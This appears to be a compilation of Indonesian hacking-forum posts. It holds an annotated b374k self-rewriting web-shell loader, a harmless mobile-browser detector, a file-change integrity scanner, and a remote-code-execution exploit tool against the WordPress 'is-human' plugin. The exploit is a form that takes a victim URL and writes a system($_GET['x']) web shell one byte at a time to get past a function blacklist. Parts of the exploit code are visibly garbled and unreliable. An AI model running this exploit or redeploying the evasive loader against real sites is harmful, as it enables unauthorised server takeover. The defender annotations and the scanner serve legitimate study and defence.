ROMANTISME Base64 b374k Polymorphic


Dear kawan-kawan…

Kalian pasti sudah pernah coba shell terupdatenya om ketek, b374k Polymorphic?
Dan kalau sudah punya hasil decode base 64 nya pasti udah sangat akrab sama script ini:





// --- Malware sample (b374k "polymorphic" loader), annotated for analysis ---
// Per-instance key. rebirth() below replaces it with a fresh make_love() name on every run,
// so the value seen here is only valid for this generation of the file.
$x = "x2d60ef22";
// Encoded payload: base64 of a deflate stream. rebirth() inflates the FIRST double-quoted
// string of the running file; in this (already decoded) listing that string is $x, which is
// not a deflate stream, so this listing is presumably the inner stage of the packed file the
// post describes rather than a runnable file on its own — TODO confirm against the packed form.
$string = "s7EvyChQSE3OyFdQz85IzCwqVbe2twMA";
// Copied verbatim into every regenerated file by rebirth(). 32 hex chars; by its name it looks
// like an md5 of the shell's access password — inferred from the name only, not verified here.
$s_pass = "0de664ecd2be02cdd54234a0d1229b43";
// Rewrites this file in place before anything else runs (see rebirth() below; functions are
// hoisted, so the call works although the definition comes later).
rebirth();
/**
 * Encoder half of the loader's home-grown codec; hate() is the inverse.
 *
 * Walks $me in chunks of strlen($you). For every byte it emits ord(byte) + ord(key byte)
 * as a decimal number, joins the numbers with "." and returns base64(gzdeflate(..., 9)).
 * The outer loop only checks the chunk start against strlen($me): when strlen($me) is not
 * a multiple of strlen($you), substr() returns "" past the end, ord("") is 0, and the key
 * bytes alone are appended for those positions.
 *
 * Triage note: base64-decoding and inflating the payload strings of a file built with this
 * loader yields a list of dot-separated integers — a quick way to recognise the family
 * without running it.
 *
 * @param string $me  data to encode
 * @param string $you key
 * @return string base64 of the deflated dot-separated sums
 */
function love($me,$you){
$progress = NULL;
// $kiss = start of the current chunk in $me, $hug = offset inside the key
for($kiss = 0; $kiss < strlen($me); $kiss += strlen($you)){
for($hug = 0; $hug < strlen($you); $hug++){
$past = (int) ord(substr($me, $kiss+$hug, 1));
$present = (int) ord(substr($you, $hug, 1));
$sweet = $past + $present;
$progress .= $sweet . ".";
}
}
return base64_encode(gzdeflate(rtrim($progress, "."), 9));
}
// Round-trips $string through the codec with key $x and discards the result, so this line has
// no effect in this listing. The regenerated file built by rebirth() wraps the equivalent
// hate() call in eval(gzinflate(base64_decode(...))); the eval is presumably what was stripped
// here when the sample was decoded — TODO confirm against the packed form.
hate(love($x,$string),$x);
/**
 * Decoder half of the codec: base64-decodes and inflates $me, splits it on ".", subtracts
 * the key byte at the same offset from each number and rebuilds the bytes with chr().
 *
 * Mirrors love(): the outer loop steps by strlen($you) over count($problems), so for a
 * non-aligned input the last chunk reads missing elements as 0 and chr() of a negative
 * value is reduced mod 256 — the source of trailing junk bytes on such input.
 *
 * @param string $me  output of love()
 * @param string $you the key that was used by love()
 * @return string decoded bytes
 */
function hate($me,$you){
$progress = NULL;
$problems = explode(".", gzinflate(base64_decode($me)));
for($mistake = 0; $mistake < count($problems); $mistake += strlen($you)){
for($hug = 0; $hug < strlen($you); $hug++){
$past = (int) $problems[$mistake+$hug];
$present = (int) ord(substr($you, $hug, 1));
$sweet = $past - $present;
$progress .= chr($sweet);
}
}
return $progress;
}
/**
 * Produces a fresh identifier for the next generation of the file:
 * "x" + first 8 hex chars of md5("man." . time() . rand(0,50) . "woman" . time() . rand(51,100)).
 *
 * The leading "x" keeps it usable as a PHP variable name. time()/rand() are not
 * cryptographic; the intent is presumably only that names differ per run so that
 * string signatures on the previous generation no longer match.
 *
 * Triage note: variables named $x followed by 8 hex digits (like $x at the top of this
 * listing) are a marker of this loader; match on the file's structure rather than on the
 * names, since the names change on every execution.
 *
 * @return string identifier of the form x[0-9a-f]{8}
 */
function make_love(){
$man = "man.".time().rand(0,50);
$woman = "woman".time().rand(51,100);
return "x" . substr(md5($man.$woman),0,8);
}
/**
 * Self-rewrite ("polymorphic") step: regenerates this file with new variable names and a
 * new key on every execution, then puts the original modification time back.
 *
 * Why a defender cares:
 *  - mtime is restored (touch($parent, $eggdate)), so "recently modified file" checks and
 *    mtime-based deface monitors do not see the rewrite. The content — and therefore the
 *    hash — changes on every request, so a hash-based baseline (like the scanner later on
 *    this page) still catches it.
 *  - Variable names and the encoded payload differ per generation, so byte/hash signatures
 *    fail; detect the structure instead: eval(gzinflate(base64_decode( next to gzdeflate,
 *    highlight_string, rename and touch in one short file.
 *  - A temporary copy is written under the first of TMP/TEMP/TMPDIR that is set (used
 *    verbatim, no separator appended), else /tmp/ if writable, else "." — in the last case
 *    the name is "." followed by the key, i.e. a dot-file in the current directory.
 *
 * As published here, `$child = "";` discards the generated source before it is written:
 * file_put_contents() then writes an empty file and returns 0, so the rename/touch branch
 * never runs and only that empty file is left behind. This copy is therefore inert in that
 * respect, presumably defanged; the wrapper that turns the packed blob into runnable PHP is
 * also not present in this listing.
 */
function rebirth()
{
// Own file name, resolved relative to the current working directory.
$parent = basename($_SERVER['PHP_SELF']);
// Own source and original mtime (restored after the rewrite).
$egg = file_get_contents($parent);
$eggdate = filemtime($parent);
// The first double-quoted string of the file is expected to be the packed stage
// (base64 of a deflate stream), itself containing four more double-quoted strings.
$checkup = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
$egg = gzinflate(base64_decode($eggs[1][0]));
$get_embrio = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
// Inner strings in the order the generated file (below) lays them out:
// encoded body, code that is eval'd first (presumably these functions), current key, password hash.
$adam = $eggs[1][0];
$one = make_love();
$embrio = $eggs[1][1];
$two = make_love();
$eve = $eggs[1][2];
$three = make_love();
$thepass = $eggs[1][3];
// Decode the body with the old key, re-encode it with the new one. $three serves both as
// the new variable name and as the new key value.
$before = hate($adam, $eve);
$after = love($before, $three);
// Next generation as a single line of PHP: three renamed strings, the password hash,
// eval of the loader, a rebirth() call, then eval of the decoded body.
$child = "\$" . $one . " = \"" . $after . "\";" .
"\$" . $two . " = \"" . $embrio . "\";" .
"\$" . $three . " = \"" . $three . "\";" .
"\$s_pass = \"" . $thepass ."\";" .
"eval(gzinflate(base64_decode(\$" . $two . ")));" .
"rebirth();" .
"eval(gzinflate(base64_decode(hate(\$". $one . ",\$" . $three . "))));";
$child = base64_encode(gzdeflate($child,9));
// Published copy discards the generated source here (see the header comment).
$child = "";
highlight_string($child);
// Temp directory selection: first env var that is set wins, used as-is.
if(!$any = getenv("TMP"))
if(!$any = getenv("TEMP"))
if(!$any = getenv("TMPDIR"))
{
if(is_writable("/tmp")) $any = "/tmp/"; else $any = ".";
}
// Write to temp, rename over the running file, restore the old mtime, remove leftovers.
// Skipped entirely when 0 bytes were written (falsy return value).
if(file_put_contents($any . $three, $child))
{
rename($any . $three , $parent);
touch($parent, $eggdate);
if(is_file($any . $three))
unlink($any . $three);
}

}
?>



Kelihatannya romantis ya?? tapi tunggu dulu gak sebatas itu. Nih aku kasih sedikit tafsirannya.

Mengeksplorasi esensi cinta dalam karya-karya umum banyak dilakukan para penulis sastra, sementara mengeksplorasi esensi cinta dalam computer programming, sebuah kemahadasyatan teknologi modern. Makanya salut sekali sama programmer yg bermanuver seperti ini.

Scripts sederhana deteksi Browser/Mobile Browser (bukan lwt userAgent)

ijin share kakak...
mudah2 bermanfaat bagi yg sedang bikin wapsite/wml

Langsung aja ya,,
PHP Code:
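<?php
/**
 * @author Jasman
 * @copyright 2010 Ihsana IT Solution
 * @version 10.2.4
 *
 * Detects Opera Mini, WAP-profile and WAP/WML-capable browsers from request headers
 * (not only from the User-Agent) and echoes a short report.
 *
 * Every value shown comes from client-controlled request headers, so it is HTML-escaped
 * before being echoed; the previous unescaped echo of $_SERVER values was a reflected XSS.
 * These headers are also trivially spoofable: use them for content negotiation only,
 * never as an access-control signal.
 */

declare(strict_types=1);

/**
 * Escape a header value for use in an HTML body.
 */
function browser_escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Build the report for the given server variables (normally $_SERVER).
 *
 * Branch order is kept from the original: Opera Mini headers first, then X-Wap-Profile,
 * then an Accept header mentioning wap/j2me/wml, otherwise a PC browser.
 *
 * @param array<string, mixed> $server request environment, e.g. $_SERVER
 * @return string HTML fragment describing the detected browser
 */
function detect_browser(array $server): string
{
    $ua = browser_escape_html((string) ($server['HTTP_USER_AGENT'] ?? ''));

    // Opera Mini: the Opera proxy adds X-OperaMini-* headers describing the handset.
    if (isset($server['HTTP_X_OPERAMINI_FEATURES'])
        || isset($server['HTTP_X_OPERAMINI_PHONE'])
        || isset($server['HTTP_X_OPERAMINI_PHONE_UA'])
    ) {
        return "Support PC Browser
        <br/>Operamini pada ponsel "
            . browser_escape_html((string) ($server['HTTP_X_OPERAMINI_PHONE'] ?? ''))
            . "<br/>User Agent Asli: "
            . browser_escape_html((string) ($server['HTTP_X_OPERAMINI_PHONE_UA'] ?? ''))
            . "<br/>User Agent Opera :" . $ua;
    }

    // Standard browser announcing a WAP profile.
    if (isset($server['HTTP_X_WAP_PROFILE'])) {
        return "Standart Browser Wapsite.
    <br/>Dengan User Agent :" . $ua;
    }

    // Browser whose Accept header lists WAP/WML (or J2ME) content types.
    $accept = strtolower((string) ($server['HTTP_ACCEPT'] ?? ''));
    if (preg_match('/wap|j2me|wml/', $accept) === 1) {
        return "Browser Support Wapsite/WML
    <br/>Dengan User Agent :" . $ua;
    }

    return "Support PC Browser
    <br/>User Agent : " . $ua;
}

echo detect_browser($_SERVER);
?>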


Source : http://devilzc0de.org/forum/thread-14552.html

Scanner utk mengetahui perubahan file

Sistem kerjanya mirip antivirus,, yakni membandingkan ceksum database dengan ceksum file sekarang. setelah web ok 100%,, kita jalankan tool untuk membuat ceksum database,,

setelah itu coba test deface/bubuhi backdoor,, waktu ngescan akan nemuin tuh file termodifikasi/ditambah.

silahkan dikembangkan lagi mw pake cronjob biar jalan otomatis berkala atw tambahin notice via email atw botnet gimananya, terserah ini basic source codenya.. 

PHP Code:
<?php
/**
 * @author      Jasman
 * @package        Function.Site
 * @subpackage     Application
 * @web http://www.pasbar.com/ and http://www.ihsana.com
 * @copyright    Copyright (C) 2011 Ihsana IT Solution. All rights reserved.
 * @license        GNU General Public License version 2 or later, see LICENSE.txt
 *
 * Scanner ini tidak bisa mendeteksi file yang telah dihapus.
 * untuk versi pertama cuma base source aja.
 * notice via email akan menyusul pada versi berikutnya.
 * insya Allah untuk plugin wp dan joomla cooming soon :D
 */
 
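// Suppresses notices/warnings; failures surface only through the returned data.
// NOTE(review): this also hides real problems (unreadable database, permission errors).
error_reporting(0);

/**
 * Folder that will be scanned.
 */
$dir = dirname(__FILE__) . DIRECTORY_SEPARATOR . 'jz-cms/';

/**
 * Folder holding the checksum database (data.db).
 * Put it in a folder that cannot be reached from outside the web root: write_db_file()
 * overwrites .htaccess there, so use an otherwise empty folder.
 *
 * NOTE(review): nothing in this script authenticates the caller. Anyone who can request
 * scanner.php?act=ceksum can rebuild the baseline and thereby hide a modification, so
 * protect the script itself (HTTP auth, IP allow-list, or run it from the CLI only).
 */
$dir_db = dirname(__FILE__);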



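/**
 * Compare the files under $dir with the checksum baseline in $dir_db/data.db.
 *
 * data.db (written by write_db_file()) holds one "md5=>path" line per file. A file is
 * reported when its path is missing from the baseline or its current md5 differs from
 * the recorded one, i.e. it was added or modified after the baseline was taken.
 * Deleted files are not detected (see the file header).
 *
 * Results are keyed by path rather than by hash. Keying by hash, as before, made a copy
 * of a known file under a new name (e.g. a renamed backdoor) invisible to the scan and
 * collapsed identical files into one entry.
 *
 * NOTE(review): md5 is not collision-resistant; for an integrity baseline prefer
 * hash_file('sha256', ...) in both scan_file() and write_db_file() and regenerate data.db.
 * Kept as md5 here so existing databases stay valid.
 *
 * @param string $dir    root folder to scan; paths are built as $thisdir.DIRECTORY_SEPARATOR.name,
 *                       exactly the way write_db_file() records them
 * @param string $dir_db folder containing data.db
 * @return array<string, array<string, mixed>> added/modified files keyed by path, each with
 *         'hash', 'file', 'readable', 'writable', 'executable', 'modified', 'created';
 *         when data.db does not exist, a single placeholder entry (hash '-',
 *         writable 'Not Found.') so the caller can show that the baseline is missing
 */
function scan_file($dir, $dir_db)
{
    $dbFile = $dir_db . DIRECTORY_SEPARATOR . 'data.db';

    if (!file_exists($dbFile)) {
        // Placeholder kept in the original shape (fixed key) for the caller's table.
        $data = [];
        $data[md5('jasman')]['file'] = $dbFile;
        $data[md5('jasman')]['hash'] = '-';
        $data[md5('jasman')]['writable'] = 'Not Found.';
        return $data;
    }

    // Baseline as path => md5. Later lines win, so a database that was appended to
    // repeatedly still resolves to the most recent hash for each path.
    $baseline = [];
    $lines = file($dbFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    if ($lines === false) {
        $lines = [];
    }
    foreach ($lines as $line) {
        // Limit 2: a path may itself contain "=>".
        $parts = explode('=>', $line, 2);
        if (count($parts) !== 2) {
            continue; // malformed line
        }
        $baseline[trim($parts[1])] = trim($parts[0]);
    }

    $data = [];
    // Iterative walk with the same path construction as write_db_file(). The realpath
    // bookkeeping stops a symlink loop from recursing forever.
    $stack = [$dir];
    $visited = [];
    while ($stack) {
        $thisdir = array_pop($stack);
        $real = realpath($thisdir);
        if ($real === false || isset($visited[$real])) {
            continue;
        }
        $visited[$real] = true;

        $entries = scandir($thisdir);
        if ($entries === false) {
            continue; // unreadable directory: skipped, as before
        }
        foreach ($entries as $entry) {
            if ($entry === '.' || $entry === '..') {
                continue;
            }
            $path = $thisdir . DIRECTORY_SEPARATOR . $entry;
            if (is_file($path)) {
                $md5 = md5_file($path);
                if ($md5 === false) {
                    $md5 = '-'; // unreadable: never matches the baseline, so it is reported
                }
                if (isset($baseline[$path]) && $baseline[$path] === $md5) {
                    continue; // unchanged since the baseline
                }
                $data[$path] = [
                    'hash' => $md5,
                    'file' => $path,
                    'readable' => is_readable($path),
                    'writable' => is_writable($path),
                    'executable' => is_executable($path),
                    'modified' => date('d-m-Y H:i:s', (int) filemtime($path)),
                    // filectime() is the inode change time on Unix, not the creation time.
                    'created' => date('d-m-Y H:i:s', (int) filectime($path)),
                ];
            } elseif (is_dir($path)) {
                $stack[] = $path;
            }
        }
    }

    return $data;
}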


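/**
 * (Re)build the checksum baseline for every file under $dir.
 *
 * Writes $dir_db/.htaccess denying web access to data.db (directives for both Apache 2.2
 * and 2.4), then rewrites $dir_db/data.db from scratch with one "md5=>path" line per file.
 * Rewriting instead of appending means a rebuilt baseline no longer keeps stale hashes
 * of files that were legitimately changed.
 *
 * The .htaccess only helps under Apache with AllowOverride enabled; keep $dir_db outside
 * the web root regardless.
 *
 * NOTE(review): this rebuild is the scanner's trust anchor — whoever can trigger it can
 * hide a modification. It must not be reachable without authentication.
 *
 * @param string $dir    root folder to index (paths built as $thisdir.DIRECTORY_SEPARATOR.name)
 * @param string $dir_db folder that receives .htaccess and data.db
 * @return array<string, array<string, mixed>> indexed files keyed by path, each with
 *         'file', 'hash', 'readable', 'writable', 'executable'; empty when nothing was found
 * @throws \RuntimeException when .htaccess or data.db cannot be written
 */
function write_db_file($dir, $dir_db)
{
    $htaccess = "<Files \"data.db\">\n"
        . "<IfModule mod_authz_core.c>\nRequire all denied\n</IfModule>\n"
        . "<IfModule !mod_authz_core.c>\ndeny from all\n</IfModule>\n"
        . "</Files>\n";
    if (file_put_contents($dir_db . DIRECTORY_SEPARATOR . '.htaccess', $htaccess) === false) {
        throw new \RuntimeException('Cannot write .htaccess in ' . $dir_db);
    }

    $dbFile = $dir_db . DIRECTORY_SEPARATOR . 'data.db';
    // 'w' (not 'a+'): the baseline is rebuilt, not accumulated.
    $fp = fopen($dbFile, 'w');
    if ($fp === false) {
        throw new \RuntimeException('Cannot open ' . $dbFile . ' for writing');
    }

    $files = [];
    try {
        // Iterative walk; the realpath bookkeeping stops a symlink loop from recursing forever.
        $stack = [$dir];
        $visited = [];
        while ($stack) {
            $thisdir = array_pop($stack);
            $real = realpath($thisdir);
            if ($real === false || isset($visited[$real])) {
                continue;
            }
            $visited[$real] = true;

            $entries = scandir($thisdir);
            if ($entries === false) {
                continue; // unreadable directory: skipped, as before
            }
            foreach ($entries as $entry) {
                if ($entry === '.' || $entry === '..') {
                    continue;
                }
                $path = $thisdir . DIRECTORY_SEPARATOR . $entry;
                if (is_file($path)) {
                    $md5 = md5_file($path);
                    if ($md5 === false) {
                        continue; // unreadable: cannot be baselined; scan_file() will keep reporting it
                    }
                    $files[$path] = [
                        'file' => $path,
                        'hash' => $md5,
                        'readable' => is_readable($path),
                        'writable' => is_writable($path),
                        'executable' => is_executable($path),
                    ];
                    fwrite($fp, $md5 . '=>' . $path . "\n");
                } elseif (is_dir($path)) {
                    $stack[] = $path;
                }
            }
        }
    } finally {
        fclose($fp);
    }

    return $files;
}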





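// --- Page: the two actions (build the baseline / scan against it) ---
echo '<p>Setelah semua design web beres, <a href="./scanner.php?act=ceksum">Buat Ceksum</a> untuk semua file.</p>';
echo '<p>Apakah ada perubahan pada file anda klik <a href="./scanner.php?act=scan">scan</a> untuk memeriksa.</p>';

// File names in the results come from the scanned tree, which is exactly what an intruder
// controls (a file called "<script>...".php would otherwise render as HTML), so every value
// taken from a scan result is escaped before it is echoed.
$esc = static function ($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};

// Strict comparison; a missing or non-string parameter selects no action.
$act = isset($_GET['act']) ? $_GET['act'] : '';

// NOTE(review): both actions are unauthenticated here. 'ceksum' rewrites the baseline and
// must be restricted (HTTP auth / IP allow-list / CLI only) before this is deployed.
if ($act === 'ceksum') {
    echo memory_get_usage();
    echo '<hr/><pre>';
    $str_files = write_db_file($dir, $dir_db);
    echo $esc(print_r($str_files, true));
}

if ($act === 'scan') {
    $scanner = scan_file($dir, $dir_db);
    echo '
    <table border="1" style="border-collapse: collapse;">
    <tr>
        <td style="text-align: center; font-weight: bold;">No.</td>
        <td style="text-align: center; font-weight: bold;">File</td>
        <td style="text-align: center; font-weight: bold;">Writable</td>
        <td style="text-align: center; font-weight: bold;">Modified</td>
        <td style="text-align: center; font-weight: bold;">Created</td>
        <td style="text-align: center; font-weight: bold;">Md5</td>
    </tr>';
    $no = 0;
    foreach ($scanner as $row) {
        $no++;
        // Keys other than 'file' and 'hash' may be absent (the "data.db not found" placeholder).
        echo '
    <tr>
        <td>' . $no . '</td>
        <td style="text-align: left; font-size: 75%;">' . $esc(isset($row['file']) ? $row['file'] : '') . '</td>
        <td style="text-align: center; font-size: 95%;">' . $esc(isset($row['writable']) ? $row['writable'] : '') . '</td>
        <td style="text-align: left; font-size: 75%;">' . $esc(isset($row['modified']) ? $row['modified'] : '') . '</td>
        <td style="text-align: left; font-size: 75%;">' . $esc(isset($row['created']) ? $row['created'] : '') . '</td>
        <td style="text-align: center; font-size: 95%;">' . $esc(isset($row['hash']) ? $row['hash'] : '') . '</td> 
    </tr>';
    }
    echo '
    </table>
    ';
}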
?>
**source belum rapi,, rapiin lagi ya,, ini salah satu rancangan module ihsana's cms beta. 


Source: http://devilzc0de.org/forum/thread-13982.html

Alternative Exploitasi Remote Code Execution

Berikut contoh Exploitasi PHP Code excute dimana pada target reguest yg masuk di filter beberapa function php seperti encoder/decoder, system, dll.
saya telah mencoba jg menggunakan string dasar chr namun tetap di blacklist. simimin mungkin udah belajar teknik exploitasi yg sebelumna. ini utk attak ke 3x lho.. ngakak
pikir dan berpikir akhirnya saya mencoba satu2 beberapa function php,, ternyata ada msh ada function yg tidak difilter yakni fwrite. kemudian saya mencoba bikin function fwrite namun gagal jg. kemudian saya test menulis bebrapa kata tanpa sintax. berhasil. smangat smangat smangat
Kesimpulan Jika bukan sintax php work
jadi bagaimana cara menulis file phpshell ke target Silahkan Pahami code RCE berikut:

PHP Code:
<?php/**
 * @author BlueBoyz
 * @copyright 2012 Www.ExploreCrew.Org
 * @version 11.3.2
 * @tutorial Alternative Remote Code Execution Vulnerability
 * @for education purphose only
 */


# <!-- start:function grabing -->
/**
 * cURL helper used by the exploit section below (a generic HTTP client).
 *
 * Sends a POST, GET or "UPLOAD" (post-fields without the POST flag) request to $url with
 * $data, with the Referer set to $url, a persistent cookie jar in cookie.txt next to this
 * script, a fixed Firefox 8 User-Agent, an Accept-Language header built from $languagge,
 * and redirects followed; returns the response body.
 *
 * Defender note: the fixed User-Agent string and the "<lang>,en-us;q=0.7,en;q=0.3"
 * Accept-Language value are constant for every request this tool sends and are worth
 * matching in access logs together with the request pattern annotated below.
 *
 * The curl_close() after the return statement is never reached.
 */
function jHTTP($languagge='en_gb'$method='POST',$url,$data){
    
$header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3' );
    
$ch curl_init();
    if (
$method == 'POST'){
        
curl_setopt($chCURLOPT_URL,$url);
        
curl_setopt($chCURLOPT_POSTTRUE );
        
curl_setopt($chCURLOPT_POSTFIELDS,$data );
    }elseif(
$method == 'GET'){
        
// GET: $data is appended to the URL as-is (the caller passes the full query string).
curl_setopt($chCURLOPT_URL,$url.''.$data);
    }elseif(
$method == 'UPLOAD'){
        
curl_setopt($chCURLOPT_URL,$url);
        
curl_setopt($chCURLOPT_POSTFIELDS$data);    
    }
    
curl_setopt($chCURLOPT_REFERER$url);

    
// Cookie jar persists across calls, so a session obtained by one request is reused by the next.
curl_setopt($chCURLOPT_COOKIEFILEdirname(__FILE__).'/cookie.txt');
    
curl_setopt($chCURLOPT_COOKIEJARdirname(__FILE__).'/cookie.txt'); 
 
    
curl_setopt($chCURLOPT_RETURNTRANSFERTRUE);   
    
// Fixed client fingerprint (see the Defender note above).
curl_setopt($chCURLOPT_USERAGENT'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0');
    
curl_setopt($chCURLOPT_HTTPHEADER,$header) ;
    
curl_setopt($chCURLOPT_FOLLOWLOCATIONTRUE);
    return 
curl_exec($ch);
    
// Unreachable: the handle is not closed until the script ends.
curl_close($ch); 
}
# --- Exploit sample (WordPress "is-human" plugin, engine.php action=log-reset), annotated for analysis ---
# What it relies on: the `type` query parameter of engine.php?action=log-reset reaches a PHP
# code-evaluation path on the target, and the post reports that the target's request filter
# blocked several function names but not fwrite. The payload below therefore appends a file
# one small piece per request using fopen/fwrite rather than sending the final code at once.
#
# Defender notes:
#  - A blacklist of function names is not a mitigation for code injection; the fix is to stop
#    evaluating request data at all (remove or update the vulnerable plugin).
#  - Detection: a burst of GET requests to wp-content/plugins/is-human/engine.php with
#    action=log-reset and a `type` value containing ";" plus fopen/fwrite, followed by a
#    new xc.php in that plugin directory; combine with the fixed User-Agent sent by jHTTP().
#  - The plugin directory must not be writable by the web server user for this to succeed.
# <!-- end:function grabing -->if(isset($_POST['exp'])){
 
    
# Take the target link from the form and append the vulnerable path plus the [xcrew] placeholder.
    
$victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error';
 
    
# Build the commands that write the file xc.php containing <?php system($_GET['x']);
    
$exploit = array (
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)"// writes <
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// writes ?
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)"// writes php
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)"// writes a whitespace character (CR)
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)"// writes system
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)"// writes (
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)"// writes $
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)"// writes _GET
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)"// writes [
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)"// writes '
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)"// writes x
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)"// writes '
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)"// writes ]
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)"// writes )
        
"\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // writes ;
        // all pieces together form <?php system($_GET['x']);
    
);
 
    
# Loop over the array above: one request per piece.
    
for($i=0;$i<count($exploit);$i++){
        
# Swap the [xcrew] placeholder for the current array element.
        
$link str_replace('[xcrew]',$exploit[$i],$victim);
        
jHTTP($languagge='en_gb''GET',$link,'');
    }
    
# Link shown on the page afterwards; points at the written file.
$info '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>';
}
#membuat form HTML nya?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
    <meta name="author" content="BlueBoyz" />
    <title>Exploit IS Human</title>
</head>
<body>
<form method="post" action="" >
<input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br />
<input type="submit" name="exp" />
</form>
<?php echo @$info ?></body>
</html> 

source:http://devilzc0de.org/forum/thread-14286.html
 